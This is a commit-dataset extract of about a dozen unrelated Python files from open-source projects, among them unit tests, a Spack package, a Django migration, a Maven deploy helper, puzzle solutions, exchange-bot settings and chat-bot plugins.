commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
4a179825234b711a729fce5bc9ffc8de029c0999 | Test for invalid data when loading | robotframework/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,HelioGuilherme66/RIDE,caio2k/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,fingeronthebutton/RIDE,fingeronthebutton/RIDE,fingeronthebutton/RIDE,caio2k/RIDE,caio2k/RIDE | utest/controller/test_loading.py | utest/controller/test_loading.py | import unittest
from robot.utils.asserts import assert_true, assert_raises, assert_raises_with_msg
from robotide.controller import ChiefController
from robotide.namespace import Namespace
from resources import MINIMAL_SUITE_PATH, RESOURCE_PATH, FakeLoadObserver
from robot.errors import DataError
class TestDataLoading(unittest.TestCase):
    """Tests for loading suite/resource data through ChiefController."""

    def setUp(self):
        # Fresh controller + observer per test so no state leaks between tests.
        self.ctrl = ChiefController(Namespace())
        self.load_observer = FakeLoadObserver()

    def test_loading_suite(self):
        self._load(MINIMAL_SUITE_PATH)
        assert_true(self.ctrl._controller is not None)

    def test_loading_resource(self):
        self._load(RESOURCE_PATH)
        assert_true(self.ctrl.resources != [])

    def test_loading_invalid_data(self):
        assert_raises(DataError, self._load, 'invalid')

    def _load(self, path):
        # Helper: load `path` and verify the observer saw the load complete.
        self.ctrl.load_data(self.load_observer, path)
        assert_true(self.load_observer.finished)

    def test_loading_invalid_datafile(self):
        assert_raises_with_msg(DataError, 'Invalid data file: invalid.',
                               self.ctrl.load_datafile, FakeLoadObserver(),
                               'invalid')

    def test_loading_invalid_resource(self):
        assert_raises_with_msg(DataError, 'Invalid resource file: invalid.',
                               self.ctrl.load_resource, 'invalid')
if __name__ == "__main__":
unittest.main()
| import unittest
from robot.utils.asserts import assert_true, assert_raises
from robotide.application.chiefcontroller import ChiefController
from robotide.namespace import Namespace
from resources import MINIMAL_SUITE_PATH, RESOURCE_PATH
from robot.errors import DataError
class _FakeObserver(object):
    """Minimal stand-in for a load observer.

    NOTE(review): calling finished() rebinds the instance attribute
    `finished` from the bound method to True; the tests later check the
    truthiness of `observer.finished`.  Unusual idiom -- confirm before
    "fixing" the name clash.
    """

    def notify(self):
        pass

    def finished(self):
        self.finished = True
class TestDataLoading(unittest.TestCase):
    """Tests for loading suite/resource data through ChiefController."""

    def setUp(self):
        # Fresh controller and observer for every test.
        self.ctrl = ChiefController(Namespace())
        self.load_observer = _FakeObserver()

    def test_loading_suite(self):
        self._load(MINIMAL_SUITE_PATH)
        assert_true(self.ctrl._controller is not None)

    def test_loading_resource(self):
        self._load(RESOURCE_PATH)
        assert_true(self.ctrl.resources != [])

    def test_loading_invalid_data(self):
        assert_raises(DataError, self._load, 'invalid')

    def _load(self, path):
        # Load `path` and check the observer was told the load finished.
        self.ctrl.load_data(self.load_observer, path)
        assert_true(self.load_observer.finished)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | Python |
f8d49af459fb3b751f44ecf625521c62fa68df0a | Check in script to delete existing autochecked tasks | sunil07t/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server,e-mission/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server | bin/ext_service/historical/fix_autocheck_tasks.py | bin/ext_service/historical/fix_autocheck_tasks.py | import logging
import argparse
import uuid
import emission.core.wrapper.user as ecwu
import emission.core.get_database as edb
import emission.net.ext_service.habitica.proxy as proxy
def fix_autocheck_for_user(uuid):
    """Replace the user's auto-created habitica tasks with fresh ones."""
    auto_tasks = find_existing_auto_tasks(uuid)
    delete_tasks(uuid, auto_tasks)
    create_new_tasks(uuid)
# I wanted to reuse existing code, but it is unclear how to do so.
# in particular, I will have either the format of the old tests or of
# the new tests. Most PRs will not keep the old and the new around side
# to side. Since this is a historical, as opposed to ongoing script, I
# think this is fine.
def find_existing_auto_tasks(uuid):
    """Return the user's habits that look auto-created.

    A habit whose notes contain the word "automatically" is treated as
    auto-created.  Habits that belong to a challenge are only logged
    (handling them is explicitly left undecided); everything else is a
    manual task and is left alone.
    """
    method_uri = "/api/v3/tasks/user"
    get_habits_uri = method_uri + "?type=habits"
    #First, get all habits and check if the habit requested already exists
    result = proxy.habiticaProxy(uuid, 'GET', get_habits_uri, None)
    habits = result.json()
    auto_tasks = []
    for habit in habits['data']:
        print habit['text'], habit["notes"], habit["id"]
        if "automatically" in habit['notes']:
            logging.debug("Found auto task %s, %s, %s" %
                          (habit['text'], habit['notes'], habit['id']))
            auto_tasks.append(habit)
        else:
            if len(habit["challenge"]) > 0:
                logging.info("Found challenge task %s, %s, %s, unsure what to do" %
                             (habit['text'], habit['notes'], habit['id']))
            else:
                logging.debug("Found manual task %s, %s, %s" %
                              (habit['text'], habit['notes'], habit['id']))
    return auto_tasks
def delete_tasks(uuid, task_list):
    """Delete each of the given habitica tasks for this user."""
    base_uri = "/api/v3/tasks/"
    for entry in task_list:
        delete_uri = base_uri + str(entry["id"])
        response = proxy.habiticaProxy(uuid, 'DELETE', delete_uri, {})
        logging.debug("Result of deleting %s = %s" % (entry["id"], response.json()))
def create_new_tasks(uuid):
    # Intentionally a no-op: recreating the auto tasks is not implemented
    # by this historical fix-up script.
    pass
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    parser = argparse.ArgumentParser()
    # Exactly one of email / uuid / --all must be supplied.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-e", "--user_email")
    group.add_argument("-u", "--user_uuid")
    group.add_argument("-a", "--all", action="store_true")
    args = parser.parse_args()

    if args.all:
        # Fix every user known to the habitica integration database.
        for uuid in edb.get_habitica_db().distinct("user_id"):
            logging.debug("About to check user %s" % uuid)
            fix_autocheck_for_user(uuid)
    else:
        if args.user_uuid:
            del_uuid = uuid.UUID(args.user_uuid)
        else:
            del_uuid = ecwu.User.fromEmail(args.user_email).uuid
        fix_autocheck_for_user(del_uuid)
| bsd-3-clause | Python |
|
89ef576ba4e707eef653c670b32fa40d862e79ec | Add package for the Python regex library (#4771) | tmerrick1/spack,krafczyk/spack,iulian787/spack,iulian787/spack,iulian787/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,TheTimmy/spack,TheTimmy/spack,lgarren/spack,EmreAtes/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,krafczyk/spack,lgarren/spack,krafczyk/spack,skosukhin/spack,lgarren/spack,iulian787/spack,krafczyk/spack,LLNL/spack,LLNL/spack,tmerrick1/spack,matthiasdiener/spack,skosukhin/spack,EmreAtes/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,mfherbst/spack,matthiasdiener/spack,lgarren/spack,EmreAtes/spack,krafczyk/spack,TheTimmy/spack,LLNL/spack,LLNL/spack,skosukhin/spack,tmerrick1/spack,matthiasdiener/spack,skosukhin/spack,lgarren/spack,skosukhin/spack | var/spack/repos/builtin/packages/py-regex/package.py | var/spack/repos/builtin/packages/py-regex/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyRegex(PythonPackage):
    """Alternative regular expression module, to replace re."""

    homepage = "https://pypi.python.org/pypi/regex/"
    url = "https://pypi.io/packages/source/r/regex/regex-2017.07.11.tar.gz"

    version('2017.07.11', '95f81ebb5273c7ad9a0c4d1ac5a94eb4')

    # Build-time-only dependency (type='build').
    depends_on('py-setuptools', type='build')
| lgpl-2.1 | Python |
|
0e6a7a805ff08f191c88bda67992cb874f538c2f | Add migration for unitconnection section types | City-of-Helsinki/smbackend,City-of-Helsinki/smbackend | services/migrations/0097_alter_unitconnection_section_type.py | services/migrations/0097_alter_unitconnection_section_type.py | # Generated by Django 4.0.5 on 2022-06-22 05:40
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 4.0.5): redefine the `choices` for
    # UnitConnection.section_type; the column stays a nullable
    # PositiveSmallIntegerField.

    dependencies = [
        ("services", "0096_create_syllables_fi_columns"),
    ]

    operations = [
        migrations.AlterField(
            model_name="unitconnection",
            name="section_type",
            field=models.PositiveSmallIntegerField(
                choices=[
                    (1, "PHONE_OR_EMAIL"),
                    (2, "LINK"),
                    (3, "TOPICAL"),
                    (4, "OTHER_INFO"),
                    (5, "OPENING_HOURS"),
                    (6, "SOCIAL_MEDIA_LINK"),
                    (7, "OTHER_ADDRESS"),
                    (8, "HIGHLIGHT"),
                    (9, "ESERVICE_LINK"),
                    (10, "PRICE"),
                    (11, "SUBGROUP"),
                ],
                null=True,
            ),
        ),
    ]
| agpl-3.0 | Python |
|
9009315381edd69adac3319b973b3bcdb16f23e4 | Add missing module wirecloud.live.utils | jpajuelo/wirecloud,jpajuelo/wirecloud,jpajuelo/wirecloud,jpajuelo/wirecloud | src/wirecloud/live/utils.py | src/wirecloud/live/utils.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016 CoNWeT Lab., Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from base64 import b64encode
def build_group_name(name):
    """Return a group-name-safe identifier: ``wc-`` + base64 of *name*.

    The encoding uses ``-`` and ``_`` as the base64 alternative characters
    and replaces ``=`` padding with ``.`` so the result contains only
    group-name-safe bytes.
    """
    encoded = b64encode(name.encode('utf-8'), b'-_').replace(b'=', b'.')
    return b"wc-" + encoded


WIRECLOUD_BROADCAST_GROUP = build_group_name('live-*')
| agpl-3.0 | Python |
|
5e49eb4fb6bce9cdeae515590530b78e4dde89d9 | Add alternate example for `match_template`. | emmanuelle/scikits.image,warmspringwinds/scikit-image,bennlich/scikit-image,rjeli/scikit-image,ofgulban/scikit-image,GaZ3ll3/scikit-image,rjeli/scikit-image,ClinicalGraphics/scikit-image,dpshelio/scikit-image,pratapvardhan/scikit-image,michaelpacer/scikit-image,chintak/scikit-image,michaelaye/scikit-image,chintak/scikit-image,chriscrosscutler/scikit-image,pratapvardhan/scikit-image,michaelaye/scikit-image,oew1v07/scikit-image,paalge/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,paalge/scikit-image,jwiggins/scikit-image,newville/scikit-image,SamHames/scikit-image,jwiggins/scikit-image,paalge/scikit-image,bsipocz/scikit-image,ajaybhat/scikit-image,blink1073/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,chintak/scikit-image,almarklein/scikit-image,chintak/scikit-image,newville/scikit-image,ofgulban/scikit-image,SamHames/scikit-image,blink1073/scikit-image,warmspringwinds/scikit-image,WarrenWeckesser/scikits-image,keflavich/scikit-image,vighneshbirodkar/scikit-image,emmanuelle/scikits.image,dpshelio/scikit-image,chriscrosscutler/scikit-image,GaZ3ll3/scikit-image,rjeli/scikit-image,WarrenWeckesser/scikits-image,almarklein/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,ofgulban/scikit-image,Hiyorimi/scikit-image,michaelpacer/scikit-image,Midafi/scikit-image,ClinicalGraphics/scikit-image,youprofit/scikit-image,emmanuelle/scikits.image,emon10005/scikit-image,Midafi/scikit-image,Hiyorimi/scikit-image,Britefury/scikit-image,robintw/scikit-image,oew1v07/scikit-image,keflavich/scikit-image,Britefury/scikit-image,juliusbierk/scikit-image,almarklein/scikit-image,emmanuelle/scikits.image,emon10005/scikit-image,bsipocz/scikit-image,robintw/scikit-image,youprofit/scikit-image,bennlich/scikit-image,juliusbierk/scikit-image | doc/examples/plot_match_face_template.py | doc/examples/plot_match_face_template.py | """
=================
Template Matching
=================
In this example, we use template matching to identify the occurrence of an
image patch (in this case, a sub-image centered on the camera man's head).
Since there's only a single match, the maximum value in the `match_template`
result` corresponds to the head location. If you expect multiple matches, you
should use a proper peak-finding function.
"""
import numpy as np
import matplotlib.pyplot as plt
from skimage import data
from skimage.feature import match_template
image = data.camera()
head = image[70:170, 180:280]

result = match_template(image, head)

fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(8, 4))

ax1.imshow(head)
ax1.set_axis_off()
ax1.set_title('template')

ax2.imshow(image)
ax2.set_axis_off()
ax2.set_title('image')

# highlight matched region
# NOTE: unravel with result.shape, not image.shape -- with the default
# pad_input=False, `match_template` returns an array smaller than the
# input, so unraveling the flat argmax with image.shape would yield the
# wrong (row, col) for the peak.
ij = np.unravel_index(np.argmax(result), result.shape)
xy = ij[::-1]  # flip (row, col) to (x, y) for matplotlib
# ndarray shape is (rows, cols) == (height, width)
hface, wface = head.shape
rect = plt.Rectangle(xy, wface, hface, edgecolor='r', facecolor='none')
ax2.add_patch(rect)

plt.show()
| bsd-3-clause | Python |
|
854fd7de75a14ee030b8f2e8a686dd96f40273de | Add mvn-push.py | onepf/OPF-mvn-repo,onepf/OPF-mvn-repo | mvn-push.py | mvn-push.py | #!/usr/bin/python
import os
import sys
import getopt
from os.path import realpath
from os.path import join
from os.path import basename
import subprocess
help_message = 'mvn-push.py --group package --id package --version version --file file [--javadoc file|path] [--sources file]'
mvn_repo=os.getcwd()
cleanup = ''
def subprocess_cmd(command):
process = subprocess.Popen(command, stdout = subprocess.PIPE, shell = True)
proc_stdout = process.communicate()[0].strip()
if proc_stdout:
print proc_stdout
def check_required(arg_value_name_pairs):
for pair in arg_value_name_pairs:
if not pair[0]:
print pair[1], 'is empty or invalid'
sys.exit(1)
def detect_packaging(file_path):
file_extension = file_path[-4:]
if file_extension == '.aar':
return 'aar'
elif file_extension == '.jar':
return 'jar'
else:
print 'wrong file extension'
sys.exit(1)
def pack_javadoc(file_path, javadoc):
if not javadoc:
return javadoc
else:
global cleanup
temp_jar = basename('%s-javadoc.jar' % file_path[:-4])
subprocess_cmd('cd {0}; jar cf {1} *'.format(javadoc, temp_jar))
cleanup = cleanup + ' ' + join(javadoc, temp_jar)
return join(javadoc, temp_jar)
def deploy(group_id, artifact_id, version, file_path, javadoc, sources, packaging):
mvn_deploy = 'mvn deploy:deploy-file -Durl=file://{0} -DgroupId={1} -DartifactId={2} -Dversion={3} -Dpackaging={4} -Dfile={5}'.format(
mvn_repo, group_id, artifact_id, version, packaging, file_path)
if sources:
mvn_deploy += ' -Dsources=%s' % sources
if javadoc:
mvn_deploy += ' -Djavadoc=%s' % javadoc
subprocess_cmd(mvn_deploy)
def main(argv):
group_id=''
artifact_id=''
version=''
file_path=''
javadoc=''
sources=''
try:
opts, args = getopt.getopt(argv, 'h:', ['group=', 'id=', 'version=', 'file=', 'javadoc=', 'sources='])
except getopt.GetoptError:
print help_message
sys.exit(1)
if len(opts) == 0:
print help_message
sys.exit(1)
for opt, arg in opts:
if opt == '-h':
print help_message
sys.exit()
elif opt == '--group':
group_id = arg
elif opt == '--id':
artifact_id = arg
elif opt == '--version':
version = arg
elif opt == '--file':
file_path = realpath(arg)
elif opt == '--javadoc':
javadoc = realpath(arg)
elif opt == '--sources':
sources = realpath(arg)
check_required(((group_id, 'group'), (artifact_id, 'id'), (version, 'version'), (file_path, 'file')))
packaging = detect_packaging(file_path)
javadoc = pack_javadoc(file_path, javadoc)
deploy(group_id, artifact_id, version, file_path, javadoc, sources, packaging)
subprocess_cmd('rm %s' % cleanup)
if __name__ == '__main__':
main(sys.argv[1:]) | apache-2.0 | Python |
|
f284bb85a0b28142850f980a33f38a3cf25d9da8 | Solve Knowit 2017/08 | matslindh/codingchallenges,matslindh/codingchallenges | knowit2017/08.py | knowit2017/08.py | memoized = {}
def christmas_number(n):
in_sequence = {1: True}
while True:
if n > 10000000:
for k in in_sequence:
memoized[k] = False
return False
in_sequence[n] = True
if n in memoized:
return memoized[n]
n = sum([int(d)**2 for d in str(n)])
if n == 1:
for k in in_sequence:
memoized[k] = True
return True
if n in in_sequence:
for k in in_sequence:
memoized[k] = False
return False
def test_christmas_number():
    """Smoke test: 13 is a known christmas (happy) number."""
    result = christmas_number(13)
    assert result is True
if __name__ == "__main__":
    # Sum every christmas number up to (and including) ten million,
    # printing a progress marker every 100k candidates.
    s = 0
    for n in range(1, 10000001):
        if n % 100000 == 0:
            print(n)
        if christmas_number(n):
            s += n
    print(s)
|
2dd0efce803c4dfcc4c5d61cf6fec1d5ee64e1b3 | test for btcSpecialTx.py | ethereum/btcrelay,ethereum/btcrelay,vaporry/btcrelay,ethers/btcrelay | test/test_btcSpecialTx.py | test/test_btcSpecialTx.py | from pyethereum import tester
from datetime import datetime, date
import math
import pytest
slow = pytest.mark.slow
class TestBtcSpecialTx(object):
    """Pyethereum-based tests for btcSpecialTx's output parsing."""

    CONTRACT = 'btcSpecialTx.py'
    CONTRACT_GAS = 55000

    ETHER = 10 ** 18

    def setup_class(cls):
        # Deploy the contract once; each test reverts to this snapshot.
        tester.gas_limit = 2 * 10**6
        cls.s = tester.state()
        cls.c = cls.s.abi_contract(cls.CONTRACT, endowment=2000*cls.ETHER)
        cls.snapshot = cls.s.snapshot()
        cls.seed = tester.seed

    def setup_method(self, method):
        # Reset chain state and RNG so tests stay independent.
        self.s.revert(self.snapshot)
        tester.seed = self.seed

    def test_testnetTx(self):
        # testnet tx a51a71f8094f9b4e266fcccd55068e809277ec79bfa44b7bdb8f1355e9bb8460
        # tx[9] of block 350559
        txStr = '010000000158115acce0e68bc58ecb89e6452380bd68da56dc0a163d9806c04b24dfefe269000000008a47304402207a0bf036d5c78d6910d608c47c9e59cbf5708df51fd22362051b8f1ecd9691d1022055ee6ace9f12f02720ce91f62916570dbd93b2aa1e91be7da8e5230f62606db7014104858527cb6bf730cbd1bcf636bc7e77bbaf0784b9428ec5cca2d8378a0adc75f5ca893d14d9db2034cbb7e637aacf28088a68db311ff6f1ebe6d00a62fed9951effffffff0210980200000000001976a914a0dc485fc3ade71be5e1b68397abded386c0adb788ac10270000000000001976a914d3193ccb3564d5425e4875fe763e26e2fce1fd3b88ac00000000'
        res = self.c.getFirst2Outputs(txStr)

        # First output value in satoshi.
        assert res[0] == 170000

        # Script indexes are byte offsets into the raw tx; *2 converts to a
        # hex-string position.  NOTE(review): presumably +6 skips the script
        # prefix bytes before the 20-byte hash160 -- confirm against contract.
        out1stScriptIndex = res[1]
        btcAddrIndex = out1stScriptIndex*2 + 6
        assert txStr[btcAddrIndex:btcAddrIndex+40] == 'a0dc485fc3ade71be5e1b68397abded386c0adb7'

        out2ndScriptIndex = res[2]
        ethAddrIndex = out2ndScriptIndex*2 + 6
        assert txStr[ethAddrIndex:ethAddrIndex+40] == 'd3193ccb3564d5425e4875fe763e26e2fce1fd3b'
| mit | Python |
|
edc5116472c49370e5bf3ff7f9f7872732b0285e | Add a solution to the phone number problem: can a phone number be represented as words in a dictionary? | aww/cs_practice | phone_numbers.py | phone_numbers.py | #!/usr/bin/env python
import unittest
# Tiny dictionary of recognizable words.
words = set(["dog", "clog", "cat", "mouse", "rat", "can",
             "fig", "dig", "mud", "a", "an", "duh", "sin",
             "get", "shit", "done", "all", "glory", "comes",
             "from", "daring", "to", "begin", ])

# Standard phone keypad mapping: letter -> digit.
dialmap = {
    'a':2, 'b':2, 'c':2,
    'd':3, 'e':3, 'f':3,
    'g':4, 'h':4, 'i':4,
    'j':5, 'k':5, 'l':5,
    'm':6, 'n':6, 'o':6,
    'p':7, 'q':7, 'r':7, 's':7,
    't':8, 'u':8, 'v':8,
    'w':9, 'x':9, 'y':9, 'z':9,
}


def tonumbers(word):
    """Convert the string 'word' into the equivalent string of phone-dailing numbers"""
    return ''.join(str(dialmap[letter]) for letter in word.lower())


# Dialing-digit renderings of every dictionary word.
wordsnum = set(tonumbers(w) for w in words)


def isword(number):
    """Return True if the string of decimal digits 'number' can be represented
    as the concatenation of words in the 'words' set, otherwise False."""
    if number in wordsnum:
        return True
    cached = isword.memoized.get(number)
    if cached is not None:
        return cached
    # Try every split point; memoize so overlapping subproblems are cheap.
    for cut in range(1, len(number)):
        if isword(number[cut:]) and isword(number[:cut]):
            isword.memoized[number] = True
            return True
    isword.memoized[number] = False
    return False
isword.memoized = {}
class TestIsWord(unittest.TestCase):
    """Unit tests for isword() against the small built-in dictionary."""

    def testGetShitDone(self):
        self.assertTrue(isword(tonumbers('getshitdone')))

    def testHas1(self):
        # No keypad letter maps to 1, so this number can never spell words.
        self.assertFalse(isword('1092340345'))

    def testDogDog(self):
        self.assertTrue(isword(tonumbers('dogdog')))

    def testMyNumber1(self):
        self.assertFalse(isword('7342393309'))

    def testMyNumber2(self):
        self.assertFalse(isword('4082434090'))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | Python |
|
904ac79bd278634c97f6f43f4d85bc0c2316117b | add configuration example | xeroc/python-graphenelib | scripts/exchange-bots/config-example.py | scripts/exchange-bots/config-example.py | from bot.strategies.maker import MakerRamp, MakerSellBuyWalls
# Local cli_wallet connection.
wallet_host = "localhost"
wallet_port = 8092
wallet_user = ""
wallet_password = ""

# Witness (blockchain) node -- BitShares public testnet here.
witness_url = "ws://testnet.bitshares.eu/ws"
witness_user = ""
witness_password = ""

watch_markets = ["PEG.PARITY : TEST", "PEG.RANDOM : TEST"]
market_separator = " : "

# Bot name -> strategy class plus its parameters.
bots = {}

#############################
# Ramps
#############################
bots["MakerRexp"] = {"bot" : MakerRamp,
                     "markets" : ["PEG.PARITY : TEST"],
                     "target_price" : "feed",
                     "spread_percentage" : 0.2,
                     "volume_percentage" : 30,
                     "ramp_price_percentage" : 2,
                     "ramp_step_percentage" : 0.1,
                     "ramp_mode" : "linear"
                     }
bots["MakerRamp"] = {"bot" : MakerRamp,
                     "markets" : ["PEG.PARITY : TEST"],
                     "target_price" : "feed",
                     "spread_percentage" : 4,
                     "volume_percentage" : 30,
                     "ramp_price_percentage" : 4,
                     "ramp_step_percentage" : 0.5,
                     "ramp_mode" : "exponential"
                     }

#############################
# Walls
#############################
bots["MakerWall"] = {"bot" : MakerSellBuyWalls,
                     "markets" : ["PEG.PARITY : TEST"],
                     "target_price" : "feed",
                     "spread_percentage" : 5,
                     "volume_percentage" : 10,
                     "symmetric_sides" : True,
                     }
bots["MakerBridge"] = {"bot" : MakerSellBuyWalls,
                       "markets" : ["PEG.PARITY : TEST"],
                       "target_price" : 1.0,
                       "spread_percentage" : 90,
                       "volume_percentage" : 10,
                       "symmetric_sides" : True,
                       }

# Account that places the orders.
# NOTE(review): presumably safe_mode=True would only simulate trades --
# confirm against the bot framework's documentation.
account = "xeroc"
safe_mode = False
| mit | Python |
|
60efa5bbab4463714df8dd93c1c7c606bee4dbaf | add giphy plugin | TeamPeggle/ppp-helpdesk | plugins/giphy.py | plugins/giphy.py | from util import http, hook
@hook.api_key('giphy')
@hook.command('giphy', autohelp=False)
@hook.command('gif', autohelp=False)
@hook.command(autohelp=False)
def giphy(inp, api_key=None):
    ".giphy [term] -- gets random gif for a term"
    # Giphy's "random" endpoint returns one gif for the given tag.
    data = http.get_json("http://api.giphy.com/v1/gifs/random", { "api_key": api_key, "tag": inp })
    return data['data']['image_url']
| unlicense | Python |
|
227a8e0f654c9797a7dedf863f7568d55a6c2f8e | add download sample from go-sciter port | pravic/pysciter | examples/download.py | examples/download.py | """Go sciter example port."""
import sciter
class MyEventHandler(sciter.EventHandler):
    """Logs document/data events for the element it is attached to."""

    def document_complete(self):
        print("content loaded.")
        pass

    def on_data_arrived(self, nm):
        print("data arrived, uri:", nm.uri, nm.dataSize)
        pass
class Frame(sciter.Window):
    """Main window: a URL label plus a frame whose content is downloaded."""

    def __init__(self):
        super().__init__(ismain=True, uni_theme=False, debug=True)
        pass

    def on_data_loaded(self, nm):
        # Window-level notification for every loaded resource.
        print("data loaded, uri:", nm.uri, nm.dataSize)
        pass

    def load(self, url):
        """Build the minimal page and request `url` into the #content frame."""
        self.set_title("Download Element Content")
        self.load_html(b'''<html><body><span id='url'>Url To Load</span><frame id='content'></frame></body></html>''', "/")

        # get root element
        root = self.get_root()

        # get span#url and frame#content:
        span = root.find_first('#url')
        content = root.find_first('#content')

        # replace span text with url provided
        text = span.get_text()
        span.set_text(url)
        print("span:", text)

        # install event handler to content frame to print data_arrived events
        self.handler = MyEventHandler(element=content)

        print("load content")
        content.request_html(url)
        pass
    pass
if __name__ == '__main__':
    import sys

    # Load the page given on the command line and run the UI event loop.
    print("Sciter version:", ".".join(map(str, sciter.version())))
    if len(sys.argv) < 2:
        sys.exit("at least one Sciter compatible page url is needed")
    print(sys.argv[1])

    frame = Frame()
    frame.load(sys.argv[1])
    frame.expand()
    frame.run_app(False)
| mit | Python |
|
dff9d7a05e2a522b3dbbd7ea18866c5ba1fc0476 | add a !stock plugin for stock images | michaelMinar/limbo,wmv/slackbot-python,uilab-github/slask,NUKnightLab/slask,palachu/sdbot,serverdensity/sdbot,mmisiewicz/slask,Marclass/limbo,UnILabKAIST/slask,TetraEtc/limbo,dorian1453/limbo,sentinelleader/limbo,TetraEtc/limbo,cmyr/debt-bot,shawnsi/limbo,llimllib/limbo,llimllib/limbo,signalnine/alanabot,kesre/slask,kylemsguy/limbo,Whirlscape/debt-bot,freshbooks/limbo,uilab-github/slask,joshshadowfax/slask,ruhee/limbo,akatrevorjay/slask,rizaon/limbo | plugins/stock.py | plugins/stock.py | """!stock <search term> return a stock photo for <search term>"""
from random import shuffle
import re
import requests
from bs4 import BeautifulSoup
def stock(searchterm):
    """Scrape shutterstock search results, return one random thumbnail URL."""
    url = "http://www.shutterstock.com/cat.mhtml?searchterm={}&search_group=&lang=en&language=en&search_source=search_form&version=llv1".format(searchterm)
    response = requests.get(url)
    page = BeautifulSoup(response.text)
    candidates = [img["src"] for img in page.select(".gc_clip img")]
    shuffle(candidates)
    return candidates[0] if candidates else ""
def on_message(msg, server):
    """Respond to "!stock <term>" chat messages with a stock photo URL."""
    match = re.findall(r"!stock (.*)", msg.get("text", ""))
    if not match:
        return
    return stock(match[0])
| mit | Python |
|
d26a78d3e0695e0bf492910c530beb54b30cdbbc | bump version number for development | pombredanne/stdeb,astraw/stdeb,pombredanne/stdeb,sathieu/stdeb,astraw/stdeb,sathieu/stdeb,benthomasson/stdeb,LeMeteore/stdeb,pombredanne/stdeb,benthomasson/stdeb,astraw/stdeb,LeMeteore/stdeb,benthomasson/stdeb,sathieu/stdeb,LeMeteore/stdeb | stdeb/__init__.py | stdeb/__init__.py | # setuptools is required for distutils.commands plugin we use
import logging
import setuptools
__version__ = '0.4.2.git'
log = logging.getLogger('stdeb')
log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
| # setuptools is required for distutils.commands plugin we use
import logging
import setuptools
__version__ = '0.4.2'
log = logging.getLogger('stdeb')
log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
| mit | Python |
1cab72ac3c5f3cea8326ebc97ccae1a8068eb839 | Add http responses collection module. | kaleidos/django-superview,kaleidos/django-superview | superview/http.py | superview/http.py | # -*- coding: utf-8 -*-
"""
The various HTTP responses for use in returning proper HTTP codes.
"""
from django.http import HttpResponse, StreamingHttpResponse
# One thin HttpResponse subclass per HTTP status code, so views can
# `return HttpXxx(...)` directly.
class HttpCreated(HttpResponse):
    status_code = 201

    def __init__(self, *args, **kwargs):
        # Pop `location` so it isn't forwarded to HttpResponse; expose it
        # through the Location header instead (conventional for 201).
        location = kwargs.pop('location', '')
        super(HttpCreated, self).__init__(*args, **kwargs)
        self['Location'] = location


class HttpAccepted(HttpResponse):
    status_code = 202


class HttpNoContent(HttpResponse):
    status_code = 204


class HttpMultipleChoices(HttpResponse):
    status_code = 300


class HttpSeeOther(HttpResponse):
    status_code = 303


class HttpNotModified(HttpResponse):
    status_code = 304


class HttpBadRequest(HttpResponse):
    status_code = 400


class HttpUnauthorized(HttpResponse):
    status_code = 401


class HttpForbidden(HttpResponse):
    status_code = 403


class HttpNotFound(HttpResponse):
    status_code = 404


class HttpMethodNotAllowed(HttpResponse):
    status_code = 405


class HttpConflict(HttpResponse):
    status_code = 409


class HttpGone(HttpResponse):
    status_code = 410


class HttpTooManyRequests(HttpResponse):
    status_code = 429


class HttpApplicationError(HttpResponse):
    status_code = 500


class HttpNotImplemented(HttpResponse):
    status_code = 501
